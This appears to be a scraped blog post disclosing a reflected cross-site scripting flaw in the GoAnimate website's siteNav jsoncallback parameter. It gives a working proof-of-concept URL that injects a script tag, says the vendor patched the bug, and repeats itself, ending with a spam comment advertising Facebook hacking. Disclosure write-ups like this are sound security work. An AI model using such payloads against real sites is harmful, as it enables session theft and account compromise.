Description:-
An independent vulnerability researcher has discovered a Cross-Site Scripting (XSS) vulnerability in GoAnimate Website www.goanimate.com, which can be exploited by an attacker to conduct XSS attacks.
Proof of concept:-
http://goanimate.com/ajax/siteNav?jsoncallback=jQuery110209239860572852194_1393431502326%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%28932656%29%3C/ScRiPt%3E&_=1393431502327
Mozilla POC :-
Internet Explorer POC :-
Conclusion:-
This vulnerability has been confirmed and patched by GoAnimate Security Team. I would like to thank them for their quick response to my report.
GoAnimate Hall of Fame:-
http://goanimate.com/video-maker-tips/security/
An independent vulnerability researcher has discovered a Cross-Site Scripting (XSS) vulnerability in GoAnimate Website www.goanimate.com, which can be exploited by an attacker to conduct XSS attacks.
Proof of concept:-
http://goanimate.com/ajax/siteNav?jsoncallback=jQuery110209239860572852194_1393431502326%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%28932656%29%3C/ScRiPt%3E&_=1393431502327
Mozilla POC :-
 |
| FOCSoft.BlogSpot.Com |
Internet Explorer POC :-
 |
| FOCSoft.BlogSpot.Com |
Conclusion:-
This vulnerability has been confirmed and patched by GoAnimate Security Team. I would like to thank them for their quick response to my report.
GoAnimate Hall of Fame:-
http://goanimate.com/video-maker-tips/security/
 |
| FOCSoft.BlogSpot.Com |
Muhammad Shahbaz (17 Years Old) is a Young blogger, SEO Expert, & Cyber Security Expert from Pakistan
Hi Friends,..
ReplyDeleteGet Free ===> Learn Hacking, FaceBook Hacking, Free Internet Tricks, Facebook Tricks, Latest All Network Database, SEO, SMO, Google Adsense Tricks, Earn Money, etc